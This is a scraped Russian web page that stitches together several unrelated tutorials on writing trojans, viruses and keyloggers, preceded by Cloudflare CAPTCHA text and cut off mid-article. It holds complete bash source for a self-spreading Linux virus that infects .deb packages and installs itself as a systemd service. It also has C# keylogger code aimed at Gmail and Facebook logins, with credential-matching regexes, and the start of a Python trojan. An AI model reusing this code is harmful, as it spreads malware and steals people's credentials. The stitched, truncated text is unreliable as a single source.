Как написать траян

Как написать троян

Completing the CAPTCHA proves you are a human and gives you temporary access to the web property.

What can I do to prevent this in the future?

If you are on a personal connection, like at home, you can run an anti-virus scan on your device to make sure it is not infected with malware.

If you are at an office or shared network, you can ask the network administrator to run a scan across the network looking for misconfigured or infected devices.

Another way to prevent getting this page in the future is to use Privacy Pass. You may need to download version 2.0 now from the Chrome Web Store.

Cloudflare Ray ID: 71ae9117ce419bec • Your IP : 82.102.23.104 • Performance & security by Cloudflare

Сервер – Клиент Изнутри. На примере и разработка программы!

Если Вам интересно посмотреть, как пишутся «Программы сервер – клиент» и как они работают на реальном примере, предлагаю прочитать пост до конца. Будет интересно!

Пример программы я решил писать на Delphi! Так как, это проще и хорошо подходит для маленького, но реального примера. Что касается грозного слова «Троян» которое я упомянул выше, то тут, получается действительно, самый настоящий троян, но с малым и безобидным функционалом.

Вы узнаете, по какому принципу пишутся «Трояны» и как они работают изнутри! Но, есть одно «НО» Трояны не пишут, так как – это будет описано ниже. Поскольку в нашем примере, «Серверная» часть программы будет много весить (Это не приемлемо для реального трояна), и мы не будет её скрывать в системе. В реальном, «Вредоносном ПО» дела обстоят немного по другому.

Серверную часть программы стараются разработать с малым размером, ну примерно «100 КБ» Плюс — минус сколько-то КБ. И скрывают её в системе, так, что искать её придется долго!…

Но все ровно, принцип разработки один! И данный пример идеально подойдёт для понимания, как работаю программы по принципу «Сервер — Клиент» Просто у нас не правильный тон разработки трояна, а оно нам надо? Правильно. НЕТ. Мы же хорошие ребята и хулиганить не собираемся!

Как работают программы по принципу «Сервер – Клиент»

Просто и в двух словах картина выглядит вот так: Вы на своём компьютере запускаете «Клиентскую» часть программы, как правило, она имеет «GUI» то есть интерфейс пользователя (Если клиент не консольный)

На компьютере, к которому вы желаете получить доступ, запускается «Серверная» часть программы, она же открывает определённый порт на чужом компьютере и не видна в системе.

Через этот порт происходит соединения, Вы в клиенте указываете порт и IPадрес компьютера, на котором запущен сервер, подключаетесь к серверу и можете спокойно выполнять какие-то действия на чужом ПК со своего компьютера! Ещё можно прочитать мой прошлый пост и узнать:

Надеюсь, что здесь объяснил, вроде как понятно и простым человеческим языком! Если что-то не ясно, дальше, на примере все станет ясно! Далее давайте определимся, какие действия буду выполняться на удалённом ПК вследствие работы нашего маленького трояна!

Какой функционал в данном примере программы Сервер – Клиент.

Честно сказать, на этом этапе, когда размышлял, что бы показать я как-то замешкался и не как не мог придумать, что-то интересное! В общем пусть будет функционал из одной возможности и до жути простой:

— Пользователь будет получать Ваше сообщение.

Не вижу смысла добавлять какие-то другие возможности. Так как, считаю, что для примера и понимание этого вполне достаточно. Так же, думаю, не стоит писать много кода, то, что имеется ниже, то же достаточно, что бы посмотреть на программу изнутри!

А за место сообщение может быть все что угодно, зависит от фантазии человека решившего написать троян и от его знаний в программировании.

Ну, а у нас будет такой прикол! Человек, сидя за компьютером, неожиданно получит сообщение, например

представляете реакцию человека? Думаю это смешно, было бы увидеть его выражение лица.

Разработка программы по принципу «Сервер – Клиент»

Приступаем к самому интересному! И начнём мы с разработки самого «Сервера» после чего напишем под него клиент! Я не буду объяснять код программы, просто, буду приводить примеры, все же у меня не блог по программированию, да и цель поста показать поэтапно процесс разработки подобных программ по типу «Сервер – Клиент»

Разработка Сервера!

Изначально, нужно научить «Сервер» открывать какой-то порт на компьютере, дабы в дальнейшем иметь возможность подключиться к нему из «Клиента» а уже после научим принимать команды и выполнять какие-то действия на ПК.

Откроем порт следующим кодом, который до боли прост:

Теперь если запустить программу появится просто, пустое окно без всяких кнопок и прочих элементов. И самое главное, на компьютере будет открыт порт с номером «666» Именно на этот порт в дальнейшем будем отправлять команды на сервер, и он в свою очередь будет их обрабатывать.

А пока убедимся, что сервер работает и порт открыт, вспоминаем команду «netstat» и смотрим результат.

Сервер – Клиент

Как видим на компьютере, вследствие запуска нашей программы действительно был открыт порт с номером «666» Это говорит только ободном, программа работает, и пришла пора научить «Сервер» принимать сообщение.

Тут дела обстоят следующие образом! Если серверу придёт команда с названием «MESSAGE_TEXT» (Название может быть любое) то сработает процедура «ShowMessage» и покажет сообщение, которое пришло вмести с командой и хранится в строковой переменной «komm»

Соответственно текст сообщение будем набирать в «Клиенте» и он может быть любого содержание!

В прочем, на этом разработка «Серверной» части закончена. В итоге у нас получился файлик «Server.exe» и пока отложим его в сторону до того момента пока не напишем «Клиент»

Разработка Клиента!

Клиент у нас будет по понятным причинам с графическим интерфейсом пользователя (GUI) и должен иметь элементы управление, кнопки и поля ввода. У меня получился вот такой вид программы:

Пример трояна Сервер – Клиент

Определимся со всеми элементами! Хотя и так понят но, как говорится, на всякий случай поясню.

IP: Поля для ввода IPкомпьютера, где запущен сервер.
Port: Указываем номер порта на котором висит сервер.
— Подключится: Кнопка для подключения к серверу.
— Текст сообщение: Поле для ввода сообщение, которое нужно отправить.
— Отправить сообщение…: Соответственно кнопка для отправки сообщение.
— Статус соединение: Тут мы узнаем, подключились или нет!

Дальше пробуем научить «Клиент» подключаться к серверу и проверим, как это работает. В данном варианте, код для кнопки «Подключится» выглядит так:

Крадущийся питон. Создаем простейший троян на Python

Ко­неч­но, при­веден­ные в статье скрип­ты никак не годят­ся для исполь­зования в боевых усло­виях: обфуска­ции в них нет, прин­ципы работы прос­ты как пал­ка, а вре­донос­ные фун­кции отсутс­тву­ют нап­рочь. Тем не менее при некото­рой сме­кал­ке их воз­можно исполь­зовать для нес­ложных пакос­тей — нап­ример, вырубить чей‑нибудь компь­ютер в клас­се (или в офи­се, если в клас­се ты не наиг­рался).

Теория

Итак, что вооб­ще такое тро­ян? Вирус — это прог­рамма, глав­ная задача которой — самоко­пиро­вание. Червь активно рас­простра­няет­ся по сети (типич­ный при­мер — «Петя» и WannaCry), а тро­ян — скры­тая вре­донос­ная прог­рамма, которая мас­киру­ется под «хороший» софт.

Ло­гика подоб­ного зараже­ния в том, что поль­зователь сам ска­чает себе вре­донос на компь­ютер (нап­ример, под видом кряк­нутой прог­раммы), сам отклю­чит защит­ные механиз­мы (ведь прог­рамма выг­лядит хорошей) и захочет оста­вить надол­го. Хакеры и тут не дрем­лют, так что в новос­тях то и дело мель­кают сооб­щения о новых жер­твах пират­ско­го ПО и о шиф­роваль­щиках, поража­ющих любите­лей халявы. Но мы‑то зна­ем, что бес­плат­ный сыр быва­ет толь­ко в мусор­ке, и сегод­ня научим­ся очень прос­то начинять тот самый сыр чем‑то не впол­не ожи­даемым.

warning

Вся информа­ция пре­дос­тавле­на исклю­читель­но в озна­коми­тель­ных целях. Ни автор, ни редак­ция не несут ответс­твен­ности за любой воз­можный вред, при­чинен­ный матери­ала­ми дан­ной статьи. Несан­кци­они­рован­ный дос­туп к информа­ции и наруше­ние работы сис­тем могут прес­ледовать­ся по закону. Пом­ни об этом.

Определяем IP

Сна­чала нам (то есть нашему тро­яну) нуж­но опре­делить­ся, где он ока­зал­ся. Важ­ная часть тво­ей информа­ции — IP-адрес, по которо­му с заражен­ной машиной мож­но будет соеди­нить­ся в даль­нейшем.

Нач­нем писать код. Сра­зу импорти­руем биб­лиоте­ки:

Обе биб­лиоте­ки не пос­тавля­ются с Python, поэто­му, если они у тебя отсутс­тву­ют, их нуж­но уста­новить коман­дой pip .

Ес­ли ты видишь ошиб­ку, что у тебя отсутс­тву­ет pip, сна­чала нуж­но уста­новить его с сай­та pypi.org. Любопыт­но, что рекомен­дуемый спо­соб уста­нов­ки pip — через pip, что, конеч­но, очень полез­но, ког­да его нет.

Код получе­ния внеш­него и внут­ренне­го адре­сов будет таким. Обра­ти вни­мание, что, если у жер­твы нес­коль­ко сетевых интерфей­сов (нап­ример, Wi-Fi и Ethernet одновре­мен­но), этот код может вес­ти себя неп­равиль­но.

Ес­ли с локаль­ным адре­сом все более‑менее прос­то — находим имя устрой­ства в сети и смот­рим IP по име­ни устрой­ства, — то вот с пуб­личным IP все нем­ного слож­нее.

Я выб­рал сайт api. ipify. org , так как на выходе нам выда­ется толь­ко одна стро­ка — наш внеш­ний IP. Из связ­ки пуб­личный + локаль­ный IP мы получим поч­ти точ­ный адрес устрой­ства.

Вы­вес­ти информа­цию еще про­ще:

Ни­ког­да не встре­чал конс­трук­ции типа print( f’ ‘) ? Бук­ва f озна­чает фор­матиро­ван­ные стро­ковые литера­лы. Прос­тыми сло­вами — прог­рам­мные встав­ки пря­мо в стро­ку.

Стро­ковые литера­лы не толь­ко хорошо смот­рятся в коде, но и помога­ют избе­гать оши­бок типа сло­жения строк и чисел (Python — это тебе на JavaScript!).

Нет, я не собираюсь рассказывать, как написать своего шифровальщика-вымогателя, майнера или эксплуатировать супер-новую уязвимость, как вы могли подумать. И тем более я не горю желанием поднимать холивар «Linux безопаснее Windows?(да)». Моей целью было написание простого вируса для linux, некого, так сказать, «Just for Fun», единственной функцией которого является распространение своей копии. О том, что у меня получилось, я расскажу в этой статье. В конце я приведу ссылку на GitHub с исходниками.

image

Дисклеймер

Данная статья написана в ознакомительных целях. Автор ни в коем случае не призывает читателей к нарушению законодательства РФ. Пожалуйста, не повторяйте действия, описанные в данной статье, предварительно не ознакомившись с главой 28 УК РФ.

И что мы, собственно, будем делать?

Самым простым в реализации механизмом распространения вируса для меня показалось распространение через модифицированные deb/rpm пакеты. Пакеты формата deb и rpm сейчас являются наиболее популярным средством распространения по для Linux. Я остановил свой выбор на формате deb, так как количество пользователей Debian-based дистрибутивов преобладает над пользователями Red Hat и ее «последователей».

Еще необходимо, чтобы вирус автоматически запускался, и через каждый определенный период времени сканировал компьютер в поисках deb-пакетов. Для удобства отладки я выбрал период равный 10 минутам.

Что такое deb-пакет?

Deb-пакет представляет из себя архив формата .ar, который не использует сжатие. Внутри архива еще три файла: debian-bynary, control.tar и data.tar

debian.binary — текстовый файл, содержащий версию формата deb-пакета, на данный момент там всегда пишут «2.0».

control.tar — архив с файлами, содержащими информацию о пакете (например — обязательный файл control) и пакеты, необходимые для установки пакета (например — скрипты preinst, postinst, prerm и postrm, запускаемые до/после установки/удаления пакета). Может быть сжат с помощью gzip или xz, в таком случае к имени архива добавляется расширение .gz или .xz соответственно.

data.tar — архив с директориями, содержащими устанавливаемые файлы. Директории представлены деревом, в виде которого они должны извлечься в корень файловой системы. Может быть сжат с помощью gzip, bzip2, lzma, xz.

Нам необходимо обратить внимание на файл control из архива control.tar. Этот файл содержит информацию о пакете, такую как автор, описание, версию, приоритет пакета в системе и т. д. Меня интересует поле depends, в котором указаны зависимости (пакеты, без которых по из данного пакета не может работать). В это поле наш вирус будет дописывать fakeroot и dpkg — утилиты, которые понадобятся при модификации других пакетов на зараженном компьютере.

Для сборки deb-пакета создается корневая директория пакета. В нее кладутся директории с устанавливаемыми файлами и директория DEBIAN, содержащую служебные файлы, среди которых control и скрипты для установки/удаления. Затем выполняется команда fakeroot dpkg-deb —build ./path.

Сначала был демон

На момент написания вируса я еще плохо представлял, что такое Cron, и поэтому пошел путем написания собственного демона для systemd. Я создал файл trojan_penguin.service, который будет помещаться в директорию /lib/systemd/system, и добавил в нее следующее:

[Unit]
Description = XXX
 
[Service]
ExecStart=/usr/bin/trojan_penguin.sh
Type=fork
 
[Install]
WantedBy=multi-user.target

ExecStart=/usr/bin/trojan_penguin.sh — тут я указал путь к файлу (к будущему вирусу), который должен запускаться при старте системы.

Type=fork — это строка показывает, что процесс должен ответвиться от родительского процесса.
Я не видел необходимости в PID-файле, по этому я не стал его добавлять.

В мануалах по написанию своего демона фалы .service предлагается размещать в директориях /usr/lib/systemd/system/ или /etc/systemd/system/. Но я в своей убунте нашел директорию /lib/systemd/system. (у меня туда попал apache2.service). Может быть кто-нибудь в комментариях напишет, для чего нужна эта директория, и чем она отличается от двух других.

Файл /usr/bin/trojan_penguin.sh у меня получился таким:

#!/bin/bash

#debug=".../Programming/projects/TrojanPenguin"
debug=""

#создаем папку для записи логов, если таковой нет
if ! [ -d $debug/var/log/trojan_penguin/ ]; then 
 mkdir $debug/var/log/trojan_penguin
fi

#работаем в бесконечном цикле,
#делая паузы по 10 минут
while [ 1 ] 
do
  list=$(find /home -name "*.deb") #ищем deb-пакеты
  # для каждого найденного пакета выполняем следующий цикл
  for line in $list
    do
      $debug/usr/bin/tp_infect.sh $line >> $debug/var/log/trojan_penguin/log #запускаем цикл, модифицирующий пакет, а логи записываем в файл log
    done 
    date > $debug/var/log/trojan_penguin/last_start #записываем время последней отработки вируса (мне это помогло во время отладки)
    sleep 600 #пауза (60 * 10 сек = 10 мин)
  done

Мы ищем deb-пакеты в разделе /home (а где их еще искать то?), пути к найденным файлам записываем в переменную list. Потом просто перебираем все строки из line и для каждого файла запускаем скрипт tp_infect.sh, который заразит этот файл. Когда я писал вирус, скрипты находились в отдельной директории, и для удобства я создал переменную debug, в которой я прописал путь к этой папке.

Демон готов, осталось научиться его запускать при старте системы. Для этого я написал скрипт postinstall. Он будет запускаться сразу после установки зараженного пакета и указывать, чтобы наш вирус запускался вместе с системой. Разместил я его в директории «/usr/bin/», чтобы от туда копировать его в заражаемые пакеты.

#!/bin/bash

#debug="/home/dima/Dropbox/Programming/projects/TrojanPenguin/TrojanPenguin"
debug=""

systemctl daemon-reload #не знаю почему, но без этой команды демон у меня иногда отказывался работать
systemctl enable trojan_penguin.service #включаем автозапуск вместе с системой
systemctl start trojan_penguin.service #запускаем демон

Модифицируем deb-пакет

Как я писал выше, архивы, содержащиеся в deb-пакете могут иметь разные разрешения. Я не стал заморачиваться, и рассмотрел только тот случай, когда архивы сжаты с помощью .xz. Файл /usr/bin/tp_infect.sh, отвечающий за модификацию, получил такое содержимое:

#!/bin/bash

#debug=".../Programming/projects/TrojanPenguin"
debug=""
temp="$debug/tmp/trojan_penguin"

#создаем временные папки
mkdir $temp
mkdir $temp/new
mkdir $temp/new/DEBIAN

#распакуем пакет
ar -p $1 data.tar.xz | tar -xJ -C $temp/new
ar -p $1 control.tar.xz | tar -xJ -C $temp/new/DEBIAN/

#отредактируем control
#в новый control копируем все поля до "Deepends", затем копируем поле "Deepends", дописывая наши зависимости, после чего добавляем оставшиеся поля.
cp $temp/new/DEBIAN/control $temp/orig_control
cat $temp/orig_control | grep  --before-context=100 Depends | grep -v  Depends > $temp/new/DEBIAN/control
cat $temp/orig_control | grep  Depends | tr -d 'rn' >> $temp/new/DEBIAN/control
echo ", fakeroot, python" >> $temp/new/DEBIAN/control
cat $temp/orig_control | grep  --after-context=100 Depends | grep -v  Depends >> $temp/new/DEBIAN/control

#скормим пакету наш постинстал
cp $debug/usr/bin/tp_postinst.sh $temp/new/DEBIAN/postinst

#достроим дерево с нужными нам директориями, если таковых нет
if ! [ -d $temp/new/usr ];
then
	mkdir $temp/new/usr
fi
if ! [ -d $temp/new/usr/bin ];
then
	mkdir $temp/new/usr/bin
fi
if ! [ -d $temp/new/lib ];
then
	mkdir $temp/new/lib
fi
if ! [ -d $temp/new/lib/systemd ];
then
	mkdir $temp/new/lib/systemd
fi
if ! [ -d $temp/new/lib/systemd/system ];
then
	mkdir $temp/new/lib/systemd/system
fi

#копируем наши файлы
cp $debug/usr/bin/trojan_penguin.sh $temp/new/usr/bin/trojan_penguin.sh
cp $debug/usr/bin/tp_infect.sh $temp/new/usr/bin/tp_infect.sh
cp $debug/usr/bin/tp_postinst.sh $temp/new/usr/bin/tp_postinst.sh
cp $debug/lib/systemd/system/trojan_penguin.service $temp/new/lib/systemd/system/

#Собираем пакет, перемещаем его на место старого и удаляем папку, в которой мы работали.
fakeroot dpkg-deb --build $temp/new
cp $temp/new.deb $1
rm -R $temp

Проблемы с postinstall

Все бы хорошо, но теперь у нас проблема. А что если в пакете уже есть postinstal? Оригинальный postinstal может быть написан на разных языках (python, bash…), может это даже бинарник. Это не позволят нам просто взять и дописать свой postinstall в него. Я решил эту проблему следующим образом:

Добавил в скрипт tp_infect.sh такую вещь:

#Проверяем, есть ли в пакете postinstal. Если да, то копируем его в другое место.
if [ -f $temp/new/usr/bin/postinst ];
then
	cp $temp/new/DEBIAN/postinst $debug/usr/bin/tp_orig_postinst
fi

А в postinstal вот это:

#выполняем оригинальный постинстал и удаляем его
if [ -f $debug/usr/bin/tp_orig_postinst ]; then
	$debug/usr/bin/tp_orig_postinst
	rm $debug/usr/bin/tp_orig_postinst
fi

Одну проблему я решил, но появилась другая. Наш вирус будет модифицировать пакет, даже если он уже заражен. При модификации вирус увидит, что в пакете есть postinstal (который на самом деле наш), переместит его в /usr/bin/, тем самым перезаписав оригинал. Чтобы этого избежать, я добавил проверку в «tp_infect.sh», модифицировали мы этот файл или нет:

if [ -f $temp/new/usr/bin/trojan_penguin.sh ];
then
	rm -R $temp
	exit 0
fi

Собираем воедино

Вирус готов. Вот ссылка на GitHub, как и обещал. Этот вирус можно собрать в отдельный deb-пакет (запустите makedeb.sh) из репозитория. Чтобы внедрить вирус в какой-либо пакет, достаточно выполнить команду:

tp_infect.sh /путь заражаемому deb-пакету/

В репозитории есть две копии скрипта postinst

DEBIAN/postinst — эта копия выполняется только при установке пустого пакета с вирусом. Я его закомментировал, чтобы вирус не запускался после установки, а модивиццировал пакеты только по команде.

usr/bin/postinst — это копия вставляется в заражаемые пакеты.

Итог

А вывод очевиден и без этой статьи: не стоит скачивать и запускать программы из непроверенных источников.

Ради любопытства, я отправил deb-пакет с вирусом на VirusTotal для анализа. На момент написания статьи ни один антивирус не задетектировал его. Вот ссылка на отчет. Интересно, сколько должно пройти времени, и сколько хостов нужно заразить этим вирусом, чтобы антивирусы обратили на него внимание?

Только зарегистрированные пользователи могут участвовать в опросе. Войдите, пожалуйста.

В интернете очень мало информации о вирусах для Linux систем, а в частности для семейства linux. Я хочу развить эту тему на Хабре в виде серии из нескольких статей. Прошу, ответить на опрос: какие из тем по вашему мнению являются наиболее интересными?


5.33%
Создание вируса, заражающего RPM-пакеты
9


10.65%
Создание вируса, собирающего данные о пользователях
18


29.59%
Делаем простой ботнет
50


21.89%
Методы защиты от вирусов ОС семейства Linux
37


8.88%
Обзор антивирусных решений для ОС семейства Linux
15


13.02%
Обзор крупных вирусных атак на ОС семейства Linux
22


6.51%
Не ограничивайся одним Linux, расширь эту тему до UNIX
11


4.14%
Мне не интересно про вирусы для ОС семейства Linux
7


0%
Свой вариант (напишу в комментариях)
0

Проголосовали 169 пользователей.

Воздержались 40 пользователей.

Время на прочтение
6 мин

Количество просмотров 134K

image

Хакерский мир можно условно разделить на три группы атакующих:

1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО.

2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее.

3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля.

Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.

Зачем ИБ-персоналу эти сомнительные навыки?

Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.

Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков.

Кейлогер

Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.

Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.

Начнем.

Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:

1.  [DllImport("user32.dll")]
2.  
3.  public static extern int GetAsyncKeyState(Int32 i);

Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:

Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:

1.  while (true)
2.  {
3.  Thread.Sleep(100);
4.  for (Int32 i = 0; i < 255; i++)
5.  {
6.  int state = GetAsyncKeyState(i);
7.  if (state == 1 || state == -32767)
8.  {
9.  Console.WriteLine((Keys)i);
10. 
11. }
12. }
13. }

Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.

Умный кейлогер

Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.

Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.

Вторая версия кода:

1.  while (true) 
2.  {
3.  IntPtr handle = GetForegroundWindow();
4.  if (GetWindowText(handle, buff, chars) > 0)
5.  {
6.  string line = buff.ToString();
7.  if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up "))
8.  {
9.  //проверка клавиатуры 
10. }
11. }
12. Thread.Sleep(100);
13. }

Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.

Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.

Еще более умный кейлогер

Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.

Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:

1.  //Ищем почтовый адрес
2.  ^[w!#$%&'*+-/=?^_`{|}~]+(.[w!#$%&'*+-/=?^_`{|}~]+)*@((([-w]+.)+[a-zA-Z]{2,4})|(([0-9]{1,3}.){3}[0-9]{1,3}))$
3.  
4.  
5.  //Ищем пароль
6.  (?=^.{6,}$)(?=.*d)(?=.*[a-zA-Z])

Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.
Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.

Для C# это выглядит так:

1.  Regex re = new Regex(@"^[w!#$%&amp;'*+-/=?^_`{|}~]+(.[w!#$%&amp;'*+-/=?^_`{|}~]+)*@((([-w]+.)+[a-zA-Z]{2,4})|(([0-9]{1,3}.){3}[0-9]{1,3}))$");
2.  Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*d)(?=.*[a-zA-Z])");
3.  string email = "Oded.awask@gmail.com";
4.  string pass = "abcde3FG";
5.  Match result = re.Match(email);
6.  Match result2 = re2.Match(pass);

Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.

Бесплатно и полностью не обнаружим

В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.

Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?

Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.

image

В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.

Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.

В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.

Как написать троян на Python

Содержание

  • 1 Как написать троян на Python
    • 1.1 Определение IP-адреса
    • 1.2 Бэкконнект по почте
    • 1.3 Создание трояна на Python
    • 1.4 Создание WiFi-стилера на Python
  • 2 Заключение

В этой статье я рас­ска­жу, как написать простой троян на Python с уда­лен­ным дос­тупом, а для боль­шей скрыт­ности мы встро­им его в игру. Даже если вы не зна­ете Python, то смо­жете луч­ше понять, как устро­ены такие вре­доно­сы, и поуп­ражнять­ся в прог­рамми­рова­нии.

Еще по теме: Как написать вирус на Python

Ко­неч­но, при­веден­ные в статье скрип­ты совсем не годят­ся для исполь­зования в боевых усло­виях: обфуска­ции в них нет, прин­ципы работы прос­ты как пал­ка, а вре­донос­ные фун­кции отсутс­тву­ют вовсе. Тем не менее при желании их воз­можно исполь­зовать для нес­ложных пакос­тей или приколов.

Как написать троян на Python

Итак, что есть тро­ян? Вирус — это прог­рамма, глав­ная задача которой — самоко­пиро­вание. Червь активно рас­простра­няет­ся по сети (типич­ный при­мер — «Петя» и WannaCry), а тро­ян — скры­тая вре­донос­ная прог­рамма, которая мас­киру­ется под «хороший» софт и шпионить за пользователем. Подробнее о троянах в статье «Что такое RAT».

Ло­гика подоб­ного зараже­ния в том, что поль­зователь сам ска­чает себе вре­донос на компь­ютер (нап­ример, под видом кряк­нутой прог­раммы), сам отклю­чит защит­ные механиз­мы (ведь прог­рамма выг­лядит хорошей) и захочет оста­вить надол­го.

Хакеры и тут не дрем­лют, так что в новос­тях то и дело мель­кают сооб­щения о новых жер­твах пират­ско­го ПО и о шиф­роваль­щиках, поража­ющих любите­лей халявы. Но мы‑то зна­ем, что бес­плат­ный сыр быва­ет толь­ко в мусор­ке, и сегод­ня научим­ся очень прос­то начинять тот самый сыр чем‑то не впол­не ожи­даемым.


Вся информа­ция пре­дос­тавле­на исклю­читель­но в озна­коми­тель­ных целях. Ни автор статьи, ни редак­ция сайта spy-soft.net не несут ответс­твен­ности за любой воз­можный вред, при­чинен­ный данным матери­ало­м. Несан­кци­они­рован­ный дос­туп к информа­ции и наруше­ние работы сис­тем могут прес­ледовать­ся по закону. Не забывайте об этом!

Определение IP-адреса

Для начала нам (то есть нашему тро­яну) нуж­но понять, где он ока­зал­ся. Важ­ная часть вашей информа­ции — IP-адрес, по которо­му с заражен­ной машиной мож­но будет соеди­нить­ся в даль­нейшем.

Нач­нем писать код. Сра­зу импорти­руем биб­лиоте­ки:

import socket

from requests import get

Обе биб­лиоте­ки не пос­тавля­ются с Python, поэто­му, если они у вас отсутс­тву­ют, их нуж­но уста­новить коман­дой
pip.

pip install socket

pip install requests


Ес­ли вы видите ошиб­ку, что у вас отсутс­тву­ет pip, сна­чала нуж­но уста­новить его с сай­та pypi.org. Любопыт­но, что рекомен­дуемый спо­соб уста­нов­ки pip — через pip, что, конеч­но, очень полез­но, ког­да его нет.

Код получе­ния внеш­него и внут­ренне­го адре­сов будет таким. Обра­тите вни­мание, что, если у жер­твы нес­коль­ко сетевых интерфей­сов (нап­ример, WiFi и Ethernet одновре­мен­но), этот код может вес­ти себя неп­равиль­но.

# Определяем имя устройства в сети

hostname = socket.gethostname()

# Определяем локальный (внутри сети) IP-адрес

local_ip = socket.gethostbyname(hostname)

# Определяем глобальный (публичный / в интернете) IP-адрес

public_ip = get(‘http://api.ipify.org’).text

Ес­ли с локаль­ным адре­сом все более‑менее прос­то — находим имя устрой­ства в сети и смот­рим IP по име­ни устрой­ства, — то вот с пуб­личным IP все несколько слож­нее.

Я выб­рал сайт
api.<wbr />ipify.<wbr />org, так как на выходе нам выда­ется толь­ко одна стро­ка — наш внеш­ний IP. Из связ­ки пуб­личный + локаль­ный IP мы получим поч­ти точ­ный адрес устрой­ства.

Вы­вес­ти информа­цию еще про­ще:

print(f‘Хост: {hostname}’)

print(f‘Локальный IP: {local_ip}’)
